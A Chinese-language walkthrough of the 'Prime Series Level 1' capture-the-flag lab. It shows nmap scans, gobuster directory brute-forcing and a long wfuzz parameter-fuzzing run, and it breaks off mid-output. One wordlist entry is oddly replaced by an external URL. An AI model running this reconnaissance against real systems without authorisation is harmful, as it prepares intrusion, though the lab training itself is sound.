Prime Series Level 1

主机发现

└─$ sudo nmap -sn 10.10.10.0/24
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:15 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.132
Host is up (0.00016s latency).
MAC Address: 00:0C:29:8F:D3:1E (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.99 seconds

端口扫描

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.132 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:16 EDT
Nmap scan report for 10.10.10.132
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:8F:D3:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.132 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:17 EDT
Nmap scan report for 10.10.10.132
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:8F:D3:1E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds

UDP

└─$ sudo nmap -sC -sU -p22,80 10.10.10.132 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:18 EDT
Nmap scan report for 10.10.10.132
Host is up (0.00038s latency).

PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:8F:D3:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

Nmap漏洞扫描

└─$ sudo nmap --script=vuln -p22,80 10.10.10.132 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:18 EDT

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: WordPress login page.
MAC Address: 00:0C:29:8F:D3:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 384.58 seconds

渗透思路

Web渗透

目录爆破

└─$ sudo gobuster dir -u http://10.10.10.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[sudo] password for kali:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 03:22:59 Starting gobuster in directory enumeration mode
===============================================================
/dev                  (Status: 200) [Size: 131]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.10.132/javascript/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.132/wordpress/]
/server-status        (Status: 403) [Size: 300]
Progress: 22381 / 62285 (35.93%)[ERROR] 2023/07/24 03:23:07 [!] parse "http://10.10.10.132/error\x1f_log": net/url: invalid control character in URL
Progress: 61924 / 62285 (99.42%)
===============================================================
2023/07/24 03:23:19 Finished
===============================================================

└─$ curl http://10.10.10.132/dev
hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking.

└─$ curl http://10.10.10.132/server-status
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.132 Port 80</address>
</body></html>

指定扩展名爆破目录

└─$ gobuster dir -u http://10.10.10.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .zip,.txt,.rar,.gz
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,txt,rar,gz
[+] Timeout:                 10s
===============================================================
2023/07/24 03:30:52 Starting gobuster in directory enumeration mode
===============================================================
/dev                  (Status: 200) [Size: 131]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.10.132/javascript/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.132/wordpress/]
/secret.txt           (Status: 200) [Size: 412]
/server-status        (Status: 403) [Size: 300]
===============================================================
2023/07/24 03:31:40 Finished
===============================================================

多出一个secret.txt文件，打开看看是什么

└─$ curl http://10.10.10.132/secret.txt
Looks like you have got some secrets.

Ok I just want to do some help to you.

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

//see the location.txt and you will get your next move//

按照提示指定扩展名为php进行目录爆破

└─$ gobuster dir -u http://10.10.10.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/07/24 03:37:06 Starting gobuster in directory enumeration mode
===============================================================
/dev                  (Status: 200) [Size: 131]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.10.132/javascript/]
/index.php            (Status: 200) [Size: 136]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.132/wordpress/]
/image.php            (Status: 200) [Size: 147]
/server-status        (Status: 403) [Size: 300]
/.php                 (Status: 403) [Size: 291]
===============================================================
2023/07/24 03:37:25 Finished
===============================================================

多出几个文件，按照对应github的fuzz页面提示对php页面进行测试

模糊测试

└─$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://10.10.10.132/index.php?FUZZ=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.132/index.php?FUZZ=something
Total requests: 951
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000001:   200        7 L      12 W       136 Ch      "@"
000000047:   200        7 L      12 W       136 Ch      "adminsql"
000000046:   200        7 L      12 W       136 Ch      "admin_logon"
000000015:   200        7 L      12 W       136 Ch      "2001"
000000003:   200        7 L      12 W       136 Ch      "01"
000000048:   200        7 L      12 W       136 Ch      "admon"
000000031:   200        7 L      12 W       136 Ch      "action"
000000045:   200        7 L      12 W       136 Ch      "adminlogon"
000000007:   200        7 L      12 W       136 Ch      "10"
000000044:   200        7 L      12 W       136 Ch      "admin_login"
000000043:   200        7 L      12 W       136 Ch      "adminlogin"
000000037:   200        7 L      12 W       136 Ch      "admin_"
000000036:   200        7 L      12 W       136 Ch      "_admin"
000000040:   200        7 L      12 W       136 Ch      "administration"
000000042:   200        7 L      12 W       136 Ch      "administrator"
000000038:   200        7 L      12 W       136 Ch      "Admin"
000000039:   200        7 L      12 W       136 Ch      "administrat"
000000035:   200        7 L      12 W       136 Ch      "admin"
000000041:   200        7 L      12 W       136 Ch      "Administration"
000000034:   200        7 L      12 W       136 Ch      "adm"
000000033:   200        7 L      12 W       136 Ch      "active"
000000026:   200        7 L      12 W       136 Ch      "academic"
000000025:   200        7 L      12 W       136 Ch      "about"
000000029:   200        7 L      12 W       136 Ch      "account"
000000030:   200        7 L      12 W       136 Ch      "accounting"
000000027:   200        7 L      12 W       136 Ch      "access"
000000028:   200        7 L      12 W       136 Ch      "accessgranted"
000000024:   200        7 L      12 W       136 Ch      "abc"
000000032:   200        7 L      12 W       136 Ch      "actions"
000000023:   200        7 L      12 W       136 Ch      "aaa"
000000022:   200        7 L      12 W       136 Ch      "aa"
000000014:   200        7 L      12 W       136 Ch      "2000"
000000016:   200        7 L      12 W       136 Ch      "2002"
000000019:   200        7 L      12 W       136 Ch      "2005"
000000021:   200        7 L      12 W       136 Ch      "a"
000000017:   200        7 L      12 W       136 Ch      "2003"
000000018:   200        7 L      12 W       136 Ch      "2004"
000000013:   200        7 L      12 W       136 Ch      "200"
000000020:   200        7 L      12 W       136 Ch      "3"
000000012:   200        7 L      12 W       136 Ch      "20"
000000011:   200        7 L      12 W       136 Ch      "2"
000000002:   200        7 L      12 W       136 Ch      "00"
000000004:   200        7 L      12 W       136 Ch      "02"
000000005:   200        7 L      12 W       136 Ch      "03"
000000006:   200        7 L      12 W       136 Ch      "1"
000000010:   200        7 L      12 W       136 Ch      "123"
000000008:   200        7 L      12 W       136 Ch      "100"
000000009:   200        7 L      12 W       136 Ch      "1000"
000000051:   200        7 L      12 W       136 Ch      "agents"
000000049:   200        7 L      12 W       136 Ch      "adsl"
000000055:   200        7 L      12 W       136 Ch      "alpha"
000000071:   200        7 L      12 W       136 Ch      "archive"
000000063:   200        7 L      12 W       136 Ch      "app"
000000069:   200        7 L      12 W       136 Ch      "apply"
000000073:   200        7 L      12 W       136 Ch      "arrow"
000000066:   200        7 L      12 W       136 Ch      "appliance"
000000068:   200        7 L      12 W       136 Ch      "applications"
000000072:   200        7 L      12 W       136 Ch      "archives"
000000070:   200        7 L      12 W       136 Ch      "apps"
000000067:   200        7 L      12 W       136 Ch      "application"
000000065:   200        7 L      12 W       136 Ch      "applets"
000000062:   200        7 L      12 W       136 Ch      "api"
000000064:   200        7 L      12 W       136 Ch      "applet"
000000061:   200        7 L      12 W       136 Ch      "apache"
000000060:   200        7 L      12 W       136 Ch      "any"
000000056:   200        7 L      12 W       136 Ch      "analog"
000000057:   200        7 L      12 W       136 Ch      "analyse"
000000059:   200        7 L      12 W       136 Ch      "answer"
000000058:   200        7 L      12 W       136 Ch      "announcements"
000000054:   200        7 L      12 W       136 Ch      "all"
000000053:   200        7 L      12 W       136 Ch      "aliases"
000000050:   200        7 L      12 W       136 Ch      "agent"
000000052:   200        7 L      12 W       136 Ch      "alias"
000000074:   200        7 L      12 W       136 Ch      "asp"
000000076:   200        7 L      12 W       136 Ch      "assets"
000000094:   200        7 L      12 W       136 Ch      "bank"
000000096:   200        7 L      12 W       136 Ch      "banner"
000000080:   200        7 L      12 W       136 Ch      "auth"
000000088:   200        7 L      12 W       136 Ch      "backup"
000000095:   200        7 L      12 W       136 Ch      "banks"
000000091:   200        7 L      12 W       136 Ch      "bak"
000000090:   200        7 L      12 W       136 Ch      "backups"
000000093:   200        7 L      12 W       136 Ch      "bak-up"
000000092:   200        7 L      12 W       136 Ch      "bakup"
000000087:   200        7 L      12 W       136 Ch      "backoffice"
000000083:   200        7 L      12 W       136 Ch      "b"
000000085:   200        7 L      12 W       136 Ch      "backdoor"
000000089:   200        7 L      12 W       136 Ch      "back-up"
000000086:   200        7 L      12 W       136 Ch      "backend"
000000084:   200        7 L      12 W       136 Ch      "back"
000000082:   200        7 L      12 W       136 Ch      "automatic"
000000079:   200        7 L      12 W       136 Ch      "audit"
000000081:   200        7 L      12 W       136 Ch      "auto"
000000075:   200        7 L      12 W       136 Ch      "aspadmin"
000000111:   200        7 L      12 W       136 Ch      "binaries"
000000099:   200        7 L      12 W       136 Ch      "basic"
000000077:   200        7 L      12 W       136 Ch      "attach"
000000097:   200        7 L      12 W       136 Ch      "banners"
000000103:   200        7 L      12 W       136 Ch      "bdata"
000000078:   200        7 L      12 W       136 Ch      "attachments"
000000122:   200        7 L      12 W       136 Ch      "boxes"
000000121:   200        7 L      12 W       136 Ch      "box"
000000120:   200        7 L      12 W       136 Ch      "bots"
000000115:   200        7 L      12 W       136 Ch      "board"
000000117:   200        7 L      12 W       136 Ch      "body"
000000119:   200        7 L      12 W       136 Ch      "bot"
000000118:   200        7 L      12 W       136 Ch      "boot"
000000116:   200        7 L      12 W       136 Ch      "boards"
000000114:   200        7 L      12 W       136 Ch      "blow"
000000113:   200        7 L      12 W       136 Ch      "blog"
000000110:   200        7 L      12 W       136 Ch      "bin"
000000112:   200        7 L      12 W       136 Ch      "biz"
000000109:   200        7 L      12 W       136 Ch      "billing"
000000102:   200        7 L      12 W       136 Ch      "bd"
000000106:   200        7 L      12 W       136 Ch      "beans"
000000108:   200        7 L      12 W       136 Ch      "bill"
000000107:   200        7 L      12 W       136 Ch      "beta"
000000105:   200        7 L      12 W       136 Ch      "bean"
000000104:   200        7 L      12 W       136 Ch      "bea"
000000101:   200        7 L      12 W       136 Ch      "batch"
000000100:   200        7 L      12 W       136 Ch      "bass"
000000146:   200        7 L      12 W       136 Ch      "catalog"
000000137:   200        7 L      12 W       136 Ch      "captcha"
000000145:   200        7 L      12 W       136 Ch      "cat"
000000125:   200        7 L      12 W       136 Ch      "bug"
000000129:   200        7 L      12 W       136 Ch      "bulk"
000000098:   200        7 L      12 W       136 Ch      "base"
000000123:   200        7 L      12 W       136 Ch      "broken"
000000144:   200        7 L      12 W       136 Ch      "cas"
000000143:   200        7 L      12 W       136 Ch      "cart"
000000142:   200        7 L      12 W       136 Ch      "carpet"
000000141:   200        7 L      12 W       136 Ch      "cards"
000000136:   200        7 L      12 W       136 Ch      "can"
000000139:   200        7 L      12 W       136 Ch      "card"
000000134:   200        7 L      12 W       136 Ch      "cachemgr"
000000131:   200        7 L      12 W       136 Ch      "buttons"
000000132:   200        7 L      12 W       136 Ch      "c"
000000128:   200        7 L      12 W       136 Ch      "builder"
000000135:   200        7 L      12 W       136 Ch      "cad"
000000133:   200        7 L      12 W       136 Ch      "cache"
000000140:   200        7 L      12 W       136 Ch      "cardinal"
000000138:   200        7 L      12 W       136 Ch      "car"
000000130:   200        7 L      12 W       136 Ch      "business"
000000127:   200        7 L      12 W       136 Ch      "build"
000000126:   200        7 L      12 W       136 Ch      "bugs"
000000161:   200        7 L      12 W       136 Ch      "cgibin"
000000153:   200        7 L      12 W       136 Ch      "cert"
000000149:   200        7 L      12 W       136 Ch      "cc"
000000147:   200        7 L      12 W       136 Ch      "catalogs"
000000124:   200        7 L      12 W       136 Ch      "bsd"
000000168:   200        7 L      12 W       136 Ch      "chart"
000000169:   200        7 L      12 W       136 Ch      "chat"
000000170:   200        7 L      12 W       136 Ch      "class"
000000171:   200        7 L      12 W       136 Ch      "classes"
000000167:   200        7 L      12 W       136 Ch      "channel"
000000163:   200        7 L      12 W       136 Ch      "cgi-win"
000000164:   200        7 L      12 W       136 Ch      "chan"
000000165:   200        7 L      12 W       136 Ch      "change"
000000166:   200        7 L      12 W       136 Ch      "changepw"
000000160:   200        7 L      12 W       136 Ch      "cgi"
000000157:   200        7 L      12 W       136 Ch      "certs"
000000158:   200        7 L      12 W       136 Ch      "cfdocs"
000000159:   200        7 L      12 W       136 Ch      "cfg"
000000162:   200        7 L      12 W       136 Ch      "cgi-bin"
000000156:   200        7 L      12 W       136 Ch      "certificates"
000000151:   200        7 L      12 W       136 Ch      "cd"
000000154:   200        7 L      12 W       136 Ch      "certenroll"
000000152:   200        7 L      12 W       136 Ch      "cdrom"
000000155:   200        7 L      12 W       136 Ch      "certificate"
000000148:   200        7 L      12 W       136 Ch      "catch"
000000178:   200        7 L      12 W       136 Ch      "cm"
000000174:   200        7 L      12 W       136 Ch      "classifieds"
000000172:   200        7 L      12 W       136 Ch      "classic"
000000150:   200        7 L      12 W       136 Ch      "ccs"
000000186:   200        7 L      12 W       136 Ch      "common"
000000195:   200        7 L      12 W       136 Ch      "configs"
000000193:   200        7 L      12 W       136 Ch      "confluence"
000000196:   200        7 L      12 W       136 Ch      "configuration"
000000194:   200        7 L      12 W       136 Ch      "config"
000000192:   200        7 L      12 W       136 Ch      "con"
000000188:   200        7 L      12 W       136 Ch      "compose"
000000189:   200        7 L      12 W       136 Ch      "composer"
000000190:   200        7 L      12 W       136 Ch      "compressed"
000000191:   200        7 L      12 W       136 Ch      "comunicator"
000000185:   200        7 L      12 W       136 Ch      "commercial"
000000182:   200        7 L      12 W       136 Ch      "coke"
000000183:   200        7 L      12 W       136 Ch      "command"
000000184:   200        7 L      12 W       136 Ch      "commerce"
000000187:   200        7 L      12 W       136 Ch      "component"
000000181:   200        7 L      12 W       136 Ch      "coffee"
000000176:   200        7 L      12 W       136 Ch      "clients"
000000179:   200        7 L      12 W       136 Ch      "cmd"
000000177:   200        7 L      12 W       136 Ch      "cluster"
000000180:   200        7 L      12 W       136 Ch      "code"
000000173:   200        7 L      12 W       136 Ch      "classified"
000000219:   200        7 L      12 W       136 Ch      "credit"
000000203:   200        7 L      12 W       136 Ch      "contact"
000000199:   200        7 L      12 W       136 Ch      "connections"
000000218:   200        7 L      12 W       136 Ch      "creation"
000000175:   200        7 L      12 W       136 Ch      "client"
000000211:   200        7 L      12 W       136 Ch      "corba"
000000197:   200        7 L      12 W       136 Ch      "configure"
000000217:   200        7 L      12 W       136 Ch      "create"
000000220:   200        7 L      12 W       136 Ch      "creditcards"
000000216:   200        7 L      12 W       136 Ch      "cpanel"
000000215:   200        7 L      12 W       136 Ch      "counter"
000000214:   200        7 L      12 W       136 Ch      "count"
000000213:   200        7 L      12 W       136 Ch      "corporate"
000000210:   200        7 L      12 W       136 Ch      "controls"
000000212:   200        7 L      12 W       136 Ch      "core"
000000209:   200        7 L      12 W       136 Ch      "controlpanel"
000000207:   200        7 L      12 W       136 Ch      "control"
000000208:   200        7 L      12 W       136 Ch      "controller"
000000206:   200        7 L      12 W       136 Ch      "contents"
000000205:   200        7 L      12 W       136 Ch      "content"
000000202:   200        7 L      12 W       136 Ch      "constants"
000000204:   200        7 L      12 W       136 Ch      "contacts"
000000201:   200        7 L      12 W       136 Ch      "constant"
000000227:   200        7 L      12 W       136 Ch      "customize"
000000221:   200        7 L      12 W       136 Ch      "crm"
000000198:   200        7 L      12 W       136 Ch      "connect"
000000200:   200        7 L      12 W       136 Ch      "console"
000000223:   200        7 L      12 W       136 Ch      "crs"
000000235:   200        7 L      12 W       136 Ch      "daemon"
000000239:   200        7 L      12 W       136 Ch      "databases"
000000244:   200        7 L      12 W       136 Ch      "dbm"
000000245:   200        7 L      12 W       136 Ch      "dbms"
000000246:   200        7 L      12 W       136 Ch      "debug"
000000243:   200        7 L      12 W       136 Ch      "dbase"
000000238:   200        7 L      12 W       136 Ch      "database"
000000240:   200        7 L      12 W       136 Ch      "dav"
000000241:   200        7 L      12 W       136 Ch      "db"
000000242:   200        7 L      12 W       136 Ch      "dba"
000000237:   200        7 L      12 W       136 Ch      "data"
000000232:   200        7 L      12 W       136 Ch      "CYBERDOCS25"
000000233:   200        7 L      12 W       136 Ch      "CYBERDOCS31"
000000236:   200        7 L      12 W       136 Ch      "dat"
000000234:   200        7 L      12 W       136 Ch      "d"
000000231:   200        7 L      12 W       136 Ch      "CYBERDOCS"
000000228:   200        7 L      12 W       136 Ch      "cv"
000000226:   200        7 L      12 W       136 Ch      "customers"
000000229:   200        7 L      12 W       136 Ch      "cvs"
000000230:   200        7 L      12 W       136 Ch      "CVS"
000000224:   200        7 L      12 W       136 Ch      "css"
000000247:   200        7 L      12 W       136 Ch      "default"
000000225:   200        7 L      12 W       136 Ch      "customer"
000000222:   200        7 L      12 W       136 Ch      "cron"
000000249:   200        7 L      12 W       136 Ch      "deletion"
000000271:   200        7 L      12 W       136 Ch      "directory"
000000273:   200        7 L      12 W       136 Ch      "disk"
000000253:   200        7 L      12 W       136 Ch      "deploy"
000000272:   200        7 L      12 W       136 Ch      "discovery"
000000269:   200        7 L      12 W       136 Ch      "dig"
000000267:   200        7 L      12 W       136 Ch      "diag"
000000268:   200        7 L      12 W       136 Ch      "dial"
000000261:   200        7 L      12 W       136 Ch      "developement"
000000270:   200        7 L      12 W       136 Ch      "dir"
000000266:   200        7 L      12 W       136 Ch      "devs"
000000262:   200        7 L      12 W       136 Ch      "developers"
000000263:   200        7 L      12 W       136 Ch      "development"
000000265:   200        7 L      12 W       136 Ch      "devices"
000000264:   200        7 L      12 W       136 Ch      "device"
000000260:   200        7 L      12 W       136 Ch      "develop"
000000259:   200        7 L      12 W       136 Ch      "devel"
000000258:   200        7 L      12 W       136 Ch      "dev60cgi"
000000257:   200        7 L      12 W       136 Ch      "dev"
000000256:   200        7 L      12 W       136 Ch      "details"
000000248:   200        7 L      12 W       136 Ch      "delete"
000000255:   200        7 L      12 W       136 Ch      "design"
000000254:   200        7 L      12 W       136 Ch      "deployment"
000000251:   200        7 L      12 W       136 Ch      "demos"
000000252:   200        7 L      12 W       136 Ch      "deny"
000000250:   200        7 L      12 W       136 Ch      "demo"
000000274:   200        7 L      12 W       136 Ch      "dispatch"
000000276:   200        7 L      12 W       136 Ch      "dms"
000000280:   200        7 L      12 W       136 Ch      "docs41"
000000292:   200        7 L      12 W       136 Ch      "dumpenv"
000000289:   200        7 L      12 W       136 Ch      "dratfs"
000000287:   200        7 L      12 W       136 Ch      "draft"
000000290:   200        7 L      12 W       136 Ch      "driver"
000000291:   200        7 L      12 W       136 Ch      "dump"
000000288:   200        7 L      12 W       136 Ch      "dragon"
000000293:   200        7 L      12 W       136 Ch      "e"
000000286:   200        7 L      12 W       136 Ch      "downloads"
000000285:   200        7 L      12 W       136 Ch      "download"
000000284:   200        7 L      12 W       136 Ch      "down"
000000278:   200        7 L      12 W       136 Ch      "doc"
000000279:   200        7 L      12 W       136 Ch      "docs"
000000283:   200        7 L      12 W       136 Ch      "documents"
000000282:   200        7 L      12 W       136 Ch      "document"
000000281:   200        7 L      12 W       136 Ch      "docs51"
000000275:   200        7 L      12 W       136 Ch      "dispatcher"
000000277:   200        7 L      12 W       136 Ch      "dns"
000000294:   200        7 L      12 W       136 Ch      "easy"
000000296:   200        7 L      12 W       136 Ch      "echannel"
000000300:   200        7 L      12 W       136 Ch      "element"
000000317:   200        7 L      12 W       136 Ch      "esp"
000000319:   200        7 L      12 W       136 Ch      "esupport"
000000308:   200        7 L      12 W       136 Ch      "english"
000000320:   200        7 L      12 W       136 Ch      "etc"
000000318:   200        7 L      12 W       136 Ch      "established"
000000316:   200        7 L      12 W       136 Ch      "esales"
000000315:   200        7 L      12 W       136 Ch      "es"
000000314:   200        7 L      12 W       136 Ch      "errors"
000000313:   200        7 L      12 W       136 Ch      "error"
000000309:   200        7 L      12 W       136 Ch      "enterprise"
000000312:   200        7 L      12 W       136 Ch      "environment"
000000310:   200        7 L      12 W       136 Ch      "env"
000000307:   200        7 L      12 W       136 Ch      "engine"
000000304:   200        7 L      12 W       136 Ch      "employees"
000000305:   200        7 L      12 W       136 Ch      "en"
000000306:   200        7 L      12 W       136 Ch      "eng"
000000311:   200        7 L      12 W       136 Ch      "environ"
000000297:   200        7 L      12 W       136 Ch      "ecommerce"
000000295:   200        7 L      12 W       136 Ch      "ebriefs"
000000321:   200        7 L      12 W       136 Ch      "event"
000000303:   200        7 L      12 W       136 Ch      "employee"
000000323:   200        7 L      12 W       136 Ch      "example"
000000302:   200        7 L      12 W       136 Ch      "email"
000000301:   200        7 L      12 W       136 Ch      "elements"
000000298:   200        7 L      12 W       136 Ch      "edit"
000000348:   200        7 L      12 W       136 Ch      "foo"
000000335:   200        7 L      12 W       136 Ch      "Extranet"
000000299:   200        7 L      12 W       136 Ch      "editor"
000000327:   200        7 L      12 W       136 Ch      "exec"
000000347:   200        7 L      12 W       136 Ch      "folder"
000000341:   200        7 L      19 W       206 Ch      "file"
000000346:   200        7 L      12 W       136 Ch      "flash"
000000343:   200        7 L      12 W       136 Ch      "filter"
000000344:   200        7 L      12 W       136 Ch      "firewall"
000000340:   200        7 L      12 W       136 Ch      "field"
000000338:   200        7 L      12 W       136 Ch      "fcgi-bin"
000000339:   200        7 L      12 W       136 Ch      "feedback"
000000345:   200        7 L      12 W       136 Ch      "first"
000000342:   200        7 L      12 W       136 Ch      "files"
000000337:   200        7 L      12 W       136 Ch      "failed"
000000330:   200        7 L      12 W       136 Ch      "explorer"
000000334:   200        7 L      12 W       136 Ch      "extranet"
000000332:   200        7 L      12 W       136 Ch      "external"
000000333:   200        7 L      12 W       136 Ch      "extra"
000000329:   200        7 L      12 W       136 Ch      "executables"
000000336:   200        7 L      12 W       136 Ch      "fail"
000000331:   200        7 L      12 W       136 Ch      "export"
000000326:   200        7 L      12 W       136 Ch      "exe"
000000328:   200        7 L      12 W       136 Ch      "executable"
000000325:   200        7 L      12 W       136 Ch      "exchange"
000000363:   200        7 L      12 W       136 Ch      "fun"
000000322:   200        7 L      12 W       136 Ch      "events"
000000351:   200        7 L      12 W       136 Ch      "forgotten"
000000349:   200        7 L      12 W       136 Ch      "forget"
000000398:   200        7 L      12 W       136 Ch      "hits"
000000355:   200        7 L      12 W       136 Ch      "formsend"
000000324:   200        7 L      12 W       136 Ch      "examples"
000000379:   200        7 L      12 W       136 Ch      "group"
000000397:   200        7 L      12 W       136 Ch      "history"
000000396:   200        7 L      12 W       136 Ch      "hide"
000000395:   200        7 L      12 W       136 Ch      "hidden"
000000390:   200        7 L      12 W       136 Ch      "header"
000000392:   200        7 L      12 W       136 Ch      "hello"
000000394:   200        7 L      12 W       136 Ch      "help"
000000391:   200        7 L      12 W       136 Ch      "headers"
000000388:   200        7 L      12 W       136 Ch      "happening"
000000393:   200        7 L      12 W       136 Ch      "helloworld"
000000389:   200        7 L      12 W       136 Ch      "head"
000000387:   200        7 L      12 W       136 Ch      "hanlder"
000000381:   200        7 L      12 W       136 Ch      "guest"
000000386:   200        7 L      12 W       136 Ch      "handler"
000000384:   200        7 L      12 W       136 Ch      "hack"
000000383:   200        7 L      12 W       136 Ch      "guests"
000000380:   200        7 L      12 W       136 Ch      "groups"
000000378:   200        7 L      12 W       136 Ch      "graphics"
000000385:   200        7 L      12 W       136 Ch      "hacker"
000000382:   200        7 L      12 W       136 Ch      "guestbook"
000000377:   200        7 L      12 W       136 Ch      "granted"
000000371:   200        7 L      12 W       136 Ch      "global"
000000373:   200        7 L      12 W       136 Ch      "globals"
000000374:   200        7 L      12 W       136 Ch      "gone"
000000370:   200        7 L      12 W       136 Ch      "get"
000000376:   200        7 L      12 W       136 Ch      "gpapp"
000000372:   200        7 L      12 W       136 Ch      "globalnav"
000000375:   200        7 L      12 W       136 Ch      "gp"
000000369:   200        7 L      12 W       136 Ch      "gest"
000000368:   200        7 L      12 W       136 Ch      "generic"
000000367:   200        7 L      12 W       136 Ch      "gate"
000000360:   200        7 L      12 W       136 Ch      "frame"
000000366:   200        7 L      12 W       136 Ch      "games"
000000364:   200        7 L      12 W       136 Ch      "function"
000000362:   200        7 L      12 W       136 Ch      "ftp"
000000359:   200        7 L      12 W       136 Ch      "forums"
000000365:   200        7 L      12 W       136 Ch      "functions"
000000361:   200        7 L      12 W       136 Ch      "framework"
000000358:   200        7 L      12 W       136 Ch      "forum"
000000356:   200        7 L      12 W       136 Ch      "formupdate"
000000405:   200        7 L      12 W       136 Ch      "htdocs"
000000399:   200        7 L      12 W       136 Ch      "home"
000000350:   200        7 L      12 W       136 Ch      "forgot"
000000352:   200        7 L      12 W       136 Ch      "form"
000000357:   200        7 L      12 W       136 Ch      "fortune"
000000353:   200        7 L      12 W       136 Ch      "format"
000000401:   200        7 L      12 W       136 Ch      "homes"
000000354:   200        7 L      12 W       136 Ch      "formhandler"
000000413:   200        7 L      12 W       136 Ch      "https://static.2ephyr.icu/blog"
000000421:   200        7 L      12 W       136 Ch      "incs"
000000422:   200        7 L      12 W       136 Ch      "index"
000000423:   200        7 L      12 W       136 Ch      "index2"
000000424:   200        7 L      12 W       136 Ch      "index_adm"
000000426:   200        7 L      12 W       136 Ch      "indexes"
000000418:   200        7 L      12 W       136 Ch      "include"
000000419:   200        7 L      12 W       136 Ch      "includes"
000000420:   200        7 L      12 W       136 Ch      "incoming"
000000425:   200        7 L      12 W       136 Ch      "index_admin"
